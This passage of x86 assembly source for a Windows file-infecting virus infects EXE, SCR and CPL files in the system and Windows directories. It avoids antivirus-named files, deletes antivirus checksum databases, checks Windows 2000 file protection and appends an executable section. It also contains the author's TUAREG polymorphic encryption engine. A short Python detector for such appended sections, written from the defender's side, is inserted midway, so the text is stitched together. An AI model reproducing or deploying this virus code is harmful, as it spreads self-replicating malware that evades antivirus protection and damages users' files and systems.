RunKeyEnd label byte
Directory1 db 80h dup (0) ; Place to get the windows, etc. dirs
Directory2 db 80h dup (0) ; Place to save the current directory
LoadRegistryFunctions proc
lea eax, [ebp+RegistryDLL]
push eax
call dword ptr [ebp+RVA_LoadLibraryA]
or eax, eax ; Error?
jz @@Return ; Exit, then
mov [ebp+HandleADVAPI32], eax ; Save handle
lea esi, [ebp+ASC_RegistryFunctions] ; Names of functions
lea edi, [ebp+RVA_RegistryFunctions] ; Storage of RVAs
@@NextRVA: push esi
push edi
push esi
push dword ptr [ebp+HandleADVAPI32]
call dword ptr [ebp+RVA_GetProcAddress] ; Get the address
or eax, eax ; Error?
jz @@Return ; Exit, then
pop edi
pop esi
mov dword ptr [edi], eax ; Save RVA
add edi, 4
@@LoopNextFunc:
inc esi ; Next char
cmp byte ptr [esi], 0 ; End of name?
jnz @@LoopNextFunc ; If not, continue increasing
inc esi ; Jump over the 0
cmp byte ptr [esi], 0 ; Another 0?
jnz @@NextRVA ; If not, continue getting names
mov eax, 1
@@Return: ret
LoadRegistryFunctions endp
InfectSystemDir proc
mov ebx, [ebp+RVA_GetSystemDirectoryA]
Common_InfectDir: ; EBX=RVA of GetSystemDirectory
push 80h
lea eax, [ebp+Directory1]
push eax
call ebx ; GetSystemDirectory or GetWindowsDirectory
or eax, eax ; If error, end
jz @@Return
call SetDirectory1 ; Set that directory
call InfectCurrentDir ; Infect the directory files
@@Return: ret ; Return
InfectSystemDir endp
InfectWindowsDir proc
mov ebx, [ebp+RVA_GetWindowsDirectoryA]
jmp Common_InfectDir ; EBX=RVA of GetWindowsDirectory
InfectWindowsDir endp ; Jump to the common part of this
; function and the InfectSystemDir
SetDirectory1 proc
lea eax, [ebp+Directory1] ; Set the directory on this
push eax ; address (windows or system)
call dword ptr [ebp+RVA_SetCurrentDirectoryA]
ret ; Return
SetDirectory1 endp
InfectCurrentDir proc
call DeleteDATs ; Delete some antivirus CRC protections
lea ecx, [ebp+FindFileMask1] ; ECX=RVA to *.EXE
call InfectCurrentDir2 ; Infect EXEs
lea ecx, [ebp+FindFileMask2] ; ECX=RVA to *.SCR
call InfectCurrentDir2 ; Infect SCRs
lea ecx, [ebp+FindFileMask3] ; ECX=RVA to *.CPL
call InfectCurrentDir2 ; Infect CPLs
ret ; Return
InfectCurrentDir endp
InfectCurrentDir2 proc
call Random ; Get a random counter to begin infection
and al, 3
mov [ebp+FileInfectionCounter], al
lea ebx, [ebp+FindFileField]
push ebx
push ecx
call dword ptr [ebp+RVA_FindFirstFileA] ; Find first file
inc eax ; Error?
jz @@Fin0 ; Then, jump
dec eax
mov dword ptr [ebp+FindFileHandle], eax ; Save handle
@@InfectAgain: cmp byte ptr [ebp+InfectAllFiles], 1 ;For infect all files
jz @@InfectAll ; instead of one of each four
dec byte ptr [ebp+FileInfectionCounter] ; Counter in -1?
jns @@DontInfect ; If not, don't infect
mov byte ptr [ebp+FileInfectionCounter], 3 ;Set count to 3
@@InfectAll: call InfectFile ; Infect the found file
@@DontInfect: lea ebx, [ebp+FindFileField] ; Get next file
push ebx
push dword ptr [ebp+FindFileHandle]
call dword ptr [ebp+RVA_FindNextFileA]
or eax, eax ; If no error or more files, jump and
jnz @@InfectAgain ; continue infection
push dword ptr [ebp+FindFileHandle] ; Close handle
call dword ptr [ebp+RVA_FindClose]
@@Fin0: ret ; Return
InfectCurrentDir2 endp
FindFileHandle dd 0
FileInfectionCounter db 0
;; InfectFile
;;------------
;; This function uses the data in FindFileField to infect the file that repre-
;; sents, so that's why in some parts of the virus I copy the data about the
;; file in that field before calling this.
InfectFile proc
cmp dword ptr [ebp+FileSizeLow], 00002004h
jb @@End
lea ebx, [ebp+FileName] ; EBX=RVA to the file name
; This function checks if the file name begins with TB (ThunderByte),
; SC (Scan and similar ones, usually McCafé), F- (F-Potatoe), PA (Panda
; Antivirus), DR (DrWeb) or NO (Nod-Ice), or it has a V in its name
; (many antivirus programs have it: AVP, INVIRCIBLE, CPAV, etc.)
call CheckFileName
jc @@End ; Carry Flag means that is a "forbidden" name,
; so we exit if CF is set
cmp dword ptr [ebp+RVA_SfcIsFileProtected], 0 ; Could be
; SFC.DLL loaded?
jz @@NoWin2000 ; If not, we're not in Win2000
push ebx
push 0 ; Check file against Win2K protection
call dword ptr [ebp+RVA_SfcIsFileProtected]
or eax, eax ; If 0, it isn't protected
jnz @@End ; If not 0, it's protected, so don't infect
@@NoWin2000:
push 80h ; Clear file attributes (remove a possible
lea ebx, [ebp+FileName] ; read-only attribute). I don't have
push ebx ; to save the old attributes coz they are
call dword ptr [ebp+RVA_SetFileAttributesA] ; saved in the
; FindFileField structure
call OpenFile ; Open file
jc @@End2 ; CF=We couldn't, so exit
call SaveDateTime ;Save date and time stamp. It's saved in
;the FindFileField structure, but I dunno
;why the timestamp wasn't restored correctly
;when I used that data, and it was
;when I used this, so I use it.
call MapFile ; Open a mapping over the file
jc @@End3 ; If we couldn't, exit
; After this, the mapping address is stored in EAX and
; [MappingAddress]
mov edi, eax ; EDI=Mapping address
cmp word ptr [edi], 'ZM' ; Has the file executable struct?
jnz @@End4 ; If not, exit
mov esi, [edi+3Ch] ; Get PE header address
cmp esi, 2000h
ja @@End4 ; Maybe compressed DOS-EXE
add esi, edi
cmp word ptr [esi], 'EP' ; Is there a PE header?
jnz @@End4 ; If not, exit
@@Loop_001: cmp dword ptr [eax], 'xet.' ; Does it begin like .text?
jnz @@LookForReloc ; If not, do next check
cmp dword ptr [eax+4], 0+'t' ; .text?
jnz @@NextSection ; If not, look next section
mov byte ptr [ebp+SectionNames+0], 1
sub eax, edi
mov [ebp+TextHeader], eax ; Physical address of .text
add eax, edi ; Restore address
jmp @@NextSection2 ; Look next section
@@LookForReloc: cmp dword ptr [eax], 'ler.' ; Does it begin like .reloc?
jnz @@LookForBss ; If not, do next check
cmp dword ptr [eax+4], 0+'co' ; .reloc?
jnz @@NextSection ; If not, look next section
sub eax, edi
mov [ebp+RelocHeader], eax ; Physical address of .reloc
add eax, edi
jmp @@NextSection2 ; Look next section
@@LookForBss: cmp dword ptr [eax], 'ssb.' ; Does it begin like .bss?
jnz @@LookForIdata ; If not, do next check
cmp dword ptr [eax+4], 0 ; .bss?
jnz @@NextSection ; If not, look next section
mov byte ptr [ebp+SectionNames+1], 1
push eax
mov eax, [eax+0Ch] ; Save the RVA of the section for
add eax, [esi+34h] ; later use in the poly engine.
mov [ebp+BssSection], eax
pop eax
jmp @@NextSection2 ; Look next section
@@LookForIdata: cmp dword ptr [eax], 'adi.' ; Does it begin like .idata?
jnz @@NextSection ; If not, do next check
cmp dword ptr [eax+4], 0+'at' ; .idata?
jnz @@NextSection ; If not, look next section
or byte ptr [eax+24h+3], 80h ;make it writable (Win98 SE)
; jmp @@NextSection ; If not, per-process fails
@@NextSection: pushad
mov edi, eax
xor edx, edx
lea esi, [ebp+SZSectionNames]
@@LoopNS_001:
push edi
push esi
xor ecx, ecx
@@LoopNS_002:
cmpsb
jnz @@NextNS_001
inc ecx
cmp ecx, 8
jnz @@LoopNS_002
mov byte ptr [ebp+edx+SectionNames], 1
pop esi
pop edi
jmp @@NextNS_002
@@NextNS_001:
pop esi
pop edi
add esi, 8
inc edx
cmp byte ptr [esi], 0
jnz @@LoopNS_001
@@NextNS_002:
popad
; mov byte ptr [ecx], '.' ; Set the '.' of the name
mov dword ptr [ecx+08h], Virus_SizePOW2 ; The virtual size
; will be the required one
mov eax, [ebx+08h] ; The RVA (virtual address) of the new
xor edx, edx ; section will be the RVA of the
push ecx ; (before) last section plus its vir-
mov ecx, [esi+38h] ; tual size rounded up to the section
div ecx ; alignment (PE header +38h).
inc eax
mul ecx
pop ecx
add eax, [ebx+0Ch]
mov dword ptr [ecx+0Ch], eax ; Set that RVA
mov dword ptr [ecx+10h], 0 ; Set its physical size to
; 0 to force its readjustment
mov eax, [ebx+14h] ; The physical (raw) offset of the new
add eax, [ebx+10h] ; section will be the raw offset of the
mov dword ptr [ecx+14h], eax ; last plus its raw size.
mov dword ptr [ecx+24h], 0A0000020h ; IMAGE_SCN_CNT_CODE |
; MEM_WRITE | MEM_EXECUTE
sub ecx, edi ; Get the mapping address of this
; section
mov [ebp+RelocHeader], ecx ; Save it here
inc word ptr [esi+06h] ;Increase the number of sections
@@ContinueWithReloc:
mov eax, [esi+28h] ; Get the initial RVA of the EXE
mov ebx, [esi+34h]
add eax, ebx ; Add the base address...
mov [ebp+InicIP], eax ; ...and save it
mov [ebp+ImageBase], ebx ; Save the base address, too
call ConstructNameForReloc
push edi
xchg edi, eax ; EAX=Mapping address
mov edi, [ebp+RelocHeader]
add edi, eax
mov edi, [edi+14h] ; EDI=Physical address of the last
add edi, eax ; section inside the executable, now
; mapped
call CalculateAPIsAddresses
push eax
call Random ; EAX=Random value, and one of the values
mov dword ptr [ebp+CryptValue2], eax ; the virus will be
; crypted with
; int 3
call Tuareg ; Call this amazing engine! :)
Sav_NumberOfSections dw 0
ConstructNameForReloc proc
pushad
@@Loop01: call Random
and eax, 3Fh
cmp eax, 2Fh
ja @@Loop01
cmp byte ptr [ebp+eax+SectionNames], 1
jz @@Loop01
shl eax, 3
mov ecx, [ebp+RelocHeader]
add ecx, [ebp+MappingAddress]
mov ebx, dword ptr [ebp+eax+SZSectionNames]
mov [ecx], ebx
mov ebx, dword ptr [ebp+eax+SZSectionNames+4]
mov [ecx+4], ebx
popad
ret ; Return
ConstructNameForReloc endp
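An added defender-side check, not part of this virus source: it reads the section table with the same header offsets the routine above uses (e_lfanew at 3Ch, NumberOfSections at PE+06h, entry point at PE+28h, SectionAlignment at PE+38h, 40-byte section headers) and flags the header that routine writes, a final section with characteristics 0A0000020h, that is, writable and executable without the READ bit. As a general heuristic going beyond this listing it also reports an entry point inside that last section. The two PE images, their section names, sizes and offsets are constructed for the test.

```python
import struct

IMAGE_SCN_CNT_CODE    = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ    = 0x40000000
IMAGE_SCN_MEM_WRITE   = 0x80000000


def parse_pe(data):
    """Return (entry_point_rva, section_alignment, sections) from a PE32 image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    num_sections, = struct.unpack_from("<H", data, e_lfanew + 0x06)
    opt_size, = struct.unpack_from("<H", data, e_lfanew + 0x14)
    entry, = struct.unpack_from("<I", data, e_lfanew + 0x28)
    sect_align, = struct.unpack_from("<I", data, e_lfanew + 0x38)
    table = e_lfanew + 0x18 + opt_size          # first section header
    sections = []
    for i in range(num_sections):
        off = table + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, vaddr, rsize, raw = struct.unpack_from("<IIII", data, off + 0x08)
        chars, = struct.unpack_from("<I", data, off + 0x24)
        sections.append({"name": name, "vsize": vsize, "vaddr": vaddr,
                         "rsize": rsize, "raw": raw, "chars": chars})
    return entry, sect_align, sections


def suspicious_last_section(data):
    """List the reasons the last section header looks like an appended code
    section. An empty list means none of the heuristics fired."""
    entry, _, sections = parse_pe(data)
    if not sections:
        return ["no section headers"]
    last = sections[-1]
    findings = []
    wx = IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE
    if last["chars"] & wx == wx:
        findings.append("last section is writable and executable")
    if last["chars"] & IMAGE_SCN_MEM_EXECUTE and not last["chars"] & IMAGE_SCN_MEM_READ:
        findings.append("executable section without the READ flag")
    if last["vaddr"] <= entry < last["vaddr"] + max(last["vsize"], last["rsize"]):
        findings.append("entry point lies in the last section")
    if last["vsize"] and last["rsize"] == 0:
        findings.append("virtual size without raw data")
    return findings


def build_sample_pe(sections, entry):
    """Construct a bare PE32 header (no code bytes) for offline testing.
    sections: iterable of (name, vsize, vaddr, rsize, raw, characteristics)."""
    opt_size = 0xE0
    img = bytearray(0x40)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)            # e_lfanew
    img += b"PE\0\0"
    img += struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0x00, 0x10B)           # PE32 magic
    struct.pack_into("<I", opt, 0x10, entry)           # AddressOfEntryPoint
    struct.pack_into("<I", opt, 0x1C, 0x400000)        # ImageBase
    struct.pack_into("<I", opt, 0x20, 0x1000)          # SectionAlignment
    struct.pack_into("<I", opt, 0x24, 0x200)           # FileAlignment
    img += opt
    for name, vsize, vaddr, rsize, raw, chars in sections:
        img += struct.pack("<8sIIIIIIHHI", name, vsize, vaddr, rsize, raw,
                           0, 0, 0, 0, chars)
    return bytes(img)


# Constructed samples. The "infected" layout mirrors the header construction in
# the listing: new RVA = last RVA + round_up(last VirtualSize, SectionAlignment),
# raw offset = last raw offset + last raw size, characteristics 0A0000020h.
CLEAN_SECTIONS = [
    (b".text", 0x800, 0x1000, 0x800, 0x400, 0x60000020),
    (b".data", 0x400, 0x2000, 0x200, 0xC00, 0xC0000040),
]
CLEAN_PE = build_sample_pe(CLEAN_SECTIONS, entry=0x1200)
INFECTED_PE = build_sample_pe(
    CLEAN_SECTIONS + [(b".xyz", 0x4000, 0x3000, 0x4000, 0xE00, 0xA0000020)],
    entry=0x3000 + 0x3C)

if __name__ == "__main__":
    for label, image in (("clean", CLEAN_PE), ("infected", INFECTED_PE)):
        print(label, suspicious_last_section(image) or "no findings")
```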
;; Oh, I know this function is only called once, but the code is more struc-
;; tured with this and clearer to me. Moreover, if I want to put more than
;; one call to this function in the future... hey, I'll have it coded already
;; :)
OpenFile proc
push 0
push 0
push 3
push 0
push 0 ; ??? (I don't remember exactly why this
push 0c0000000h ; values and no others :)
push ebx ; EBX=RVA to the file name (in FindFileField)
call dword ptr [ebp+RVA_CreateFileA] ; Open the file
inc eax
jz @@Error ; If error, return carry flag
dec eax
mov dword ptr [ebp+FileHandle], eax ; Save handle...
clc ; ...clear carry flag...
ret ; ...and return
@@Error: stc
ret
OpenFile endp
MappingHandle dd 0 ; Variables
MappingAddress dd 0
FileHandle dd 0
FileDAT1 db 'AVP.CRC',0
FileDAT2 db 'ANTI-VIR.DAT',0
FileDAT3 db 'CHKLIST.MS',0
FileDAT4 db 'IVB.NTZ',0
;; If we are in Win2K, some files are protected by the operating system. Since
;; they aren't all the files on the hard disk (only the system ones), we only
;; have to check whether a file is protected or not. For that check that I do
;; in InfectFile, we need to load SFC.DLL, which has the protection APIs. If
;; we can't load it, then we aren't in Win2K, so we put 0 in the RVA-storage
;; variable to know that the function can't be called. Normally, under Win2K
;; this DLL is always loaded (like ADVAPI32.DLL), so we'll get the module
;; handle as if we called GetModuleHandleA. If not, then we load it :)
LoadSFCFunctions proc
lea eax, [ebp+SFC_Dll]
push eax
call dword ptr [ebp+RVA_LoadLibraryA]
mov dword ptr [ebp+HandleSFC], eax
or eax, eax
jz @@EndOfSFCs
lea ebx, [ebp+ASC_SfcIsFileProtected]
push ebx
push eax
call dword ptr [ebp+RVA_GetProcAddress]
@@EndOfSFCs:
mov dword ptr [ebp+RVA_SfcIsFileProtected], eax ; 0 or
ret ; address
LoadSFCFunctions endp
SFC_Dll db 'SFC.DLL',0
HandleSFC dd 0
ASC_SfcIsFileProtected db 'SfcIsFileProtected',0 ; The only function we
RVA_SfcIsFileProtected dd 0 ; need
LoadIMAGEHLPFunctions proc
lea eax, [ebp+IMAGEHLP_Dll]
push eax
call dword ptr [ebp+RVA_LoadLibraryA]
mov dword ptr [ebp+HandleIMAGEHLP], eax
or eax, eax
jz @@EndOfIMAGEHLPs
lea ebx, [ebp+ASC_CheckSumMappedFile]
push ebx
push eax
call dword ptr [ebp+RVA_GetProcAddress]
@@EndOfIMAGEHLPs:
mov dword ptr [ebp+RVA_CheckSumMappedFile], eax
ret
LoadIMAGEHLPFunctions endp
IMAGEHLP_Dll db 'IMAGEHLP.DLL',0
HandleIMAGEHLP dd 0
ASC_CheckSumMappedFile db 'CheckSumMappedFile',0
RVA_CheckSumMappedFile dd 0
;;; This function creates a decryptor that fills the 40 free bytes at the be-
;;; ginning of the virus. That (shitty polymorphic) decryptor is made to avoid
;;; cryptanalysis. Moreover, this function gets some values for the later use
;;; of the TUAREG.
ModifyDumbDecryptor proc
pushad
@@AgainRnd: call Random
or eax, eax
jz @@AgainRnd
mov [ebp+DecryptKey], eax ; Get the decryption key for the
; main encryption (TUAREG)
@@AgainRnd2: call Random
and al, 3
jz @@AgainRnd2
dec al
mov byte ptr [ebp+EncryptType], al ; Get method: 0=ADD,
; 1=SUB, 2=XOR
lea edi, [ebp+Inic_Virus]
;; Let's use the TUAREG functions
mov dword ptr [ebp+Index1Register], 08080808h
call SelectARegister
mov [ebp+Index1Register], al
call SelectARegister
mov [ebp+Index2Register], al
call SelectARegister
mov [ebp+KeyRegister], al
lea ebx, [ebp+@@SetIndex]
lea ecx, [ebp+@@SetCounter]
lea edx, [ebp+@@SetKey]
lea esi, [ebp+@@Garbage]
call RandomCalling
mov esi, edi
@@GetOtherType:
call Random
and eax, 3
jz @@GetOtherType
dec eax
mov [ebp+EncryptType2], al
cmp al, 1
jb @@PutSUB
jz @@PutADD
@@PutXOR: mov al, 0031h
jmp @@Next01
@@PutADD: mov al, 0001h
jmp @@Next01
@@PutSUB: mov al, 0029h
@@Next01: mov ah, [ebp+KeyRegister]
shl ah, 3
or ah, [ebp+Index1Register]
cmp byte ptr [ebp+Index1Register], 5
jnz @@Next02
or ah, 40h
stosw
xor al, al
stosb
jmp @@Next03
@@Next02: stosw
@@Next03: call @@Garbage
push esi
lea ebx, [ebp+@@ModifyKey]
lea ecx, [ebp+@@ModifyIndex]
lea edx, [ebp+@@Garbage]
lea esi, [ebp+@@Ret]
call RandomCalling
pop esi
@@Garbage2: pushad
call Random
and al, 3
jz @@OneByteWithoutRegister
cmp al, 2
jb @@OneByteWithRegister
jz @@TwoBytes2
@@Garbage_XCHGEAX:
call Random
and al, 7
cmp al, 4
jz @@Garbage_XCHGEAX
add al, 90h
stosb
jmp @@EndGarbage
@@Garbage: pushad
call Random
and al, 3
jz @@TwoBytes
cmp al, 2
jb @@OneByteWithoutRegister
jz @@EndGarbage
@@OneByteWithRegister:
call Random
and al, 8
mov dl, al
call SelectARegister
or al, dl
add al, 40h
stosb
jmp @@EndGarbage
@@OneByteWithoutRegister:
call Random
and eax, 07h
mov al, byte ptr [ebp+eax+@@OneByteTable]
stosb
jmp @@EndGarbage
@@TwoBytes2:
test edi, 1
jnz @@EndGarbage
@@TwoBytes:
call SelectARegister
mov dl, al
call Random
and ax, 0738h
mov dh, ah
inc eax
call RandomFlags
jz @@TwoBytes_01
xchg dh, dl
add al, 2
@@TwoBytes_01:
shl dh, 3
mov ah, 0C0h
or ah, dl
or ah, dh
stosw
@@EndGarbage:
mov [esp+S_EDI], edi
popad
ret
ModifyDumbDecryptor endp
KeyModification db 0
KeyModifier dd 0
EncryptType2 db 0
;; This routine copies the indicated frame dword by dword, and before storing
;; each dword it encrypts it with the encryption key. There is one control
;; variable (CopyingVirus) that controls whether we have to leave the first
;; 3Ch bytes unencrypted (the little decryptor) and we have to encrypt with
;; two encryption keys instead of one. Cryptanalysis is hard with two decryp-
;; tion keys because the relation from one byte to another doesn't remain
;; constant when you apply XOR+XOR or ADD+XOR or SUB+XOR, as I apply in this
;; virus. If this doesn't avoid anything, maybe next time I'll code two 8 Kb
;; sized decryptors with the TUAREG and with more techniques of encryption (or
;; two encryptions, or position-based decryptions, or things like that :).
EncryptWhileStoring proc
push edx
cmp byte ptr [ebp+CopyingVirus], 1 ; Virus code?
jnz @@Jump_000 ; If not, jump
mov edx, 3Ch/4 ; Leave the first 3Ch bytes with only
; an encryption layer
jmp @@Loop_001
@@Jump_000: xor edx, edx ; EDX=0
@@Loop_001: lodsd
cmp byte ptr [ebp+CopyingVirus], 1
jnz @@Next2
or edx, edx ; While EDX isn't 0, we only encrypt with
jz @@Next1 ; the main encryption key
dec edx
jmp @@Next2
@@Next1: cmp byte ptr [ebp+EncryptType2], 1
jb @@ADD2
jz @@SUB2
@@XOR2: xor eax, dword ptr [ebp+CryptValue2]
jmp @@Next3
@@ADD2: add eax, dword ptr [ebp+CryptValue2]
jmp @@Next3
@@SUB2: sub eax, dword ptr [ebp+CryptValue2]
@@Next3: push eax
mov eax, [ebp+CryptValue2]
cmp byte ptr [ebp+KeyModification], 1
jb @@ModADD
jz @@ModSUB
cmp byte ptr [ebp+KeyModification], 3
jb @@ModXOR
@@ModROL: rol eax, 1
jmp @@Next4
@@ModADD: add eax, [ebp+KeyModifier]
jmp @@Next4
@@ModSUB: sub eax, [ebp+KeyModifier]
jmp @@Next4
@@ModXOR: xor eax, [ebp+KeyModifier]
@@Next4: mov [ebp+CryptValue2], eax
pop eax
@@Next2: cmp byte ptr [ebp+EncryptType], 1
jb @@ADD
jz @@SUB
@@XOR: xor eax, dword ptr [ebp+DecryptKey]
jmp @@Next
@@ADD: add eax, dword ptr [ebp+DecryptKey]
jmp @@Next
@@SUB: sub eax, dword ptr [ebp+DecryptKey]
@@Next: stosd
dec ecx
jnz @@Loop_001 ; Repeat <ECX> times (I don't use LOOP coz
pop edx ; the jump exceeds 128 bytes :)
ret
EncryptWhileStoring endp
CopyingVirus db 0
CalculateAPIsAddresses proc
;; ESI=Address of PE header
pushad
lea edi, [ebp+APIInfo+4]
mov ecx, 20h
xor eax, eax
@@LoopKK: mov [edi], eax
add edi, 10h
loop @@LoopKK
Idata_Phys dd 0
Idata_Virt dd 0
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;----------------------------------------------------------------------------;
; TUAREG - Tameless Unpredictable Anarchic Relentless Encryption Generator
;----------------------------------------------------------------------------;
; The name is quite strambotic :), but I had to justify why the engine is
; called "TUAREG". Anyway, the name isn't new, as I've been on this project
; since 1998, even before making the MeDriPolEn.
;
; This engine features:
;
; PRIDE - Pseudo-Random Index DEcryption
; Branching Technique - Avoids linear execution of the decryption loop
;
; These two techniques are explained in the article "Advanced decryption
; construction" in 29A#5, where they are better explained than they would be
; here.
;
; Some notes:
; - The code of the subroutines will be at the end of every branch, for every
;   subroutine created in that branch (when inserting code, the engine selects
;   randomly whether to call an already created one or to create a new one
;   and call it).
; - The registers have a "touched" flag, which avoids their use before a
;   valid value is set on them (something that sets lots of flags on heuristic
;   scanners). So, when you call SelectARegisterWithInit, it'll look whether
;   the register is "touched". If it isn't, before returning it'll do a DoMOV
;   with a random value and set the register as "touched".
; - This version became 1.0 after adding calls to the Win32 API (concretely to
;   KERNEL32), not directly but through the import table (like a normal app.).
; - "Recursivity" is the main word in the making of this engine. Almost every
;   routine is prepared to be called in recursive instances, and with
;   recursivity we make the generated code become complex as hell. Just look
;   at the code :).
; - The engine is HUGE (more than half of the virus is this engine), and,
;   corresponding to its size, the decryptor it generates is one of the most
;   complex decryptors ever generated by any existing polymorphic engine. I'm
;   not saying it's the best, but sure it's one of the best :).
; - Nothing more, enjoy it as much as I did coding it!
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; EAX=Displacement from the beginning to the virus
; EBX=Virtual address of the beginning of the encrypted part
; ECX=Place where the decryptors must be put
; Size of encrypted part is Virus_Size+Host_Data_Size
TuaregFlags dd 0
BranchIdentifier db 0
AddressOfTuaregStackFrame dd 0
EPAddition dd 0
;; These flags are individual for each branch, so they aren't global. This
;; allows each branch to have a "unique" behaviour sometimes.
;;
;; Flags:
;; Bit 0: Use key register: 0=YES, 1=NO
;; Bit 1-2: 00=Use buffer register, 01=XOR again Index2, 10=PUSH/POP Index2
;; 11=Reserved, get the flags again
;; Bit 3: 0=No action, 1=Exchange Index1 and Index2 when using one of them
;; as memory index (avoids one possible algorithmic clue for detection)
;; Bit 4-5: 00=Functional branch code in a subroutine
;; Bit 6-7: 00=Index calculation + decryption in a subroutine
;; Bit 8-9: 00=Decryption in a subroutine
;; Bit 10-11: 00=All index modifications in a subroutine
;; Bit 12-13: 00=Modify index1 in a subroutine
;; Bit 14-15: 00=Mask index1 in a subroutine
;; Bit 16-17: 00=Modify index2 in a subroutine
;; Bit 18-19: 00=Mask index2 in a subroutine
;; Bit 20-31: Reserved for future expansion
call Random
and eax, Virus_SizePOW2 - 8
mov [ebp+Index1Modifier], eax ; Set Index1 modifier
call Random
and eax, 3
add eax, 4
mov [ebp+Index2Modifier], eax ; Set Index2 modifier
; Register selection
mov dword ptr [ebp+Index1Register], 08080808h
@@OtherRegister:
call SelectARegister
cmp byte ptr [ebp+AnyAPIFound], 1
jnz @@SelectAllForKey
cmp al, 2
jbe @@OtherRegister
@@SelectAllForKey:
mov [ebp+KeyRegister], al
call SelectARegister
mov [ebp+Index1Register], al
call SelectARegister
mov [ebp+Index2Register], al
call SelectARegister
mov [ebp+BufferRegister], al
mov eax, dword ptr [ebp+Index1Register]
mov dword ptr [ebp+CopyOfUsedRegisters], eax ; Save a copy
call Random
and eax, 7Ch
add eax, [ebp+BssSection]
mov [ebp+ReservedBssAddress], eax ; Save a .bss address
jmp @@NextThing
@@NoBssSection:
mov eax, [ebp+EncryptedDataBeginAddress]
add eax, offset SystemTime - offset Inic_Virus
mov [ebp+BssSection], eax
call Random
and eax, 7Ch
add eax, [ebp+BssSection]
mov [ebp+ReservedBssAddress], eax ; Get it from another
; place
@@NextThing:
mov eax, [ebp+EncryptedDataBeginAddress]
push eax
push eax
push eax
add eax, offset SystemTime - offset Inic_Virus
mov [ebp+Data1Section], eax
pop eax
add eax, offset Directory1 - offset Inic_Virus
mov [ebp+Data2Section], eax
pop eax
add eax, offset ArrayOfCalls1 - offset Inic_Virus
mov [ebp+Data3Section], eax
pop eax
add eax, offset CallsLevel1 - offset Inic_Virus
mov [ebp+Data4Section], eax ; Set some free frames for
; memory reads/writes. Later,
; the function SelectAnAddress will
; give an address from one of this
; frames to read or write freely.
mov ecx, 30h
@@LoopFillMemVars2:
mov dword ptr [ebp+4*ecx+ReservedMemVars_Addr-4], 0
mov byte ptr [ebp+ecx+ReservedMemVars_F-1], 0
loop @@LoopFillMemVars2
call Random
and eax, Virus_SizePOW2 - 4
mov [ebp+InitialValue], eax ; Set initial value of the
; Index2
@@InsertFunctionalCode:
movzx eax, byte ptr [ebp+BranchIdentifier]
shl eax, 6 ; *40h
add eax, dword ptr [ebp+AddressOfTuaregStackFrame]
mov [ebp+TuaregFlags], eax
@@IFC_Next_02:
;; Now we have to modify Index1 and Index2. Since we can code it interleaved
;; (each modification is composed of two main instructions), the least
;; difficult way to code it is like this. The modification of Index1 is adding
;; a random multiple-of-8 value. The modification of Index2 is adding a random
;; value between 4 and 7. The masking of Index1 is making the instruction
;; AND Index1,Virus_SizePOW2-4, and so is the masking of Index2.
;; Little maths: since Index1 and Index2 are a random number between 0 and
;; Virus_SizePOW2, when we add to them a number less than Virus_SizePOW2 (as
;; is the case), the result will never be more than double Virus_SizePOW2, so
;; the bit immediately above the highest bit set in Virus_SizePOW2-4 (in this
;; case, since Virus_SizePOW2-4 is 7FFCh) is bit 15. So, if we put in a dword
;; Virus_SizePOW2-4 (7FFCh) and leave bit 15 cleared, we can set the rest of
;; the bits (16 to 31) to a random state, because those bits are always 0 in
;; Index1 and Index2. This is a way of confusing this instruction with the
;; garbage ones: it's a working mask, but it's random in a great part of the
;; whole dword.
;; So, we select a combination. Between the modification and the masking we
;; insert lots of garbage (as always).
call Random
and eax, 7
jz @@Combination0
cmp al, 2
jb @@Combination1
jz @@Combination2
cmp al, 4
jb @@Combination3
jz @@Combination4
cmp al, 6
jae @@IFC_Next_02 ; Select up to 6 combinations
@@Combination5: call ModifyIndex2 ; comb 5: Modify Index2, Modify Index1,
call ModifyIndex1 ; Mask Index1, Mask Index2
jmp @@SubComb1
@@Combination0: call ModifyIndex1 ; comb 0: Modify Index1, Modify Index2,
call ModifyIndex2 ; Mask Index1, Mask Index2
@@SubComb1: call MaskIndex1
call MaskIndex2
jmp @@IFC_Next_03
@@Combination1: call ModifyIndex1 ; Comb 1: Modify Index1, Mask Index1,
call MaskIndex1 ; Modify Index2, Mask Index2
call ModifyIndex2
call MaskIndex2
jmp @@IFC_Next_03
@@Combination2: call ModifyIndex1 ; Comb 2: Modify Index1, Modify Index2,
call ModifyIndex2 ; Mask Index2, Mask Index1
jmp @@SubComb2
@@Combination3: call ModifyIndex2 ; Comb 3: Modify Index2, Mask Index2,
call MaskIndex2 ; Modify Index1, Mask Index1
call ModifyIndex1
call MaskIndex1
jmp @@IFC_Next_03
@@Combination4: call ModifyIndex2 ; Comb 4: Modify Index2, Modify Index1,
call ModifyIndex1 ; Mask Index2, Mask Index1
@@SubComb2: call MaskIndex2
call MaskIndex1
;; When we arrive here, the code to decrypt is already coded. Now we have to
;; test whether we have decrypted the whole virus body or we have to continue
;; decrypting.
@@IFC_Next_03:
call DoCMP ; Do a CMP Index2,InitialValue (or similar)
call RandomFlags ; JNZ to loop or JZ/JMP?
jz @@MakeJZ ; Jump to use JZ
; We make: JNZ Loop
mov ax, 850Fh ; Insert a JNZ.
stosw ; Store the opcode of JNZ
@@CompleteJZ_JNZ:
mov eax, [ebp+JumpsToCompleteNdx]
mov [ebp+eax+JumpsToComplete], edi ; Insert the jump
add edi, 4 ; address and increase
add eax, 4 ; the index
mov [ebp+JumpsToCompleteNdx], eax
call DoRandomGarbage
call DoRandomGarbage ; Make garbage
call DoFinalJMP ; Make the jump to the decrypted part
jmp @@ContinueWithFunctionalCode
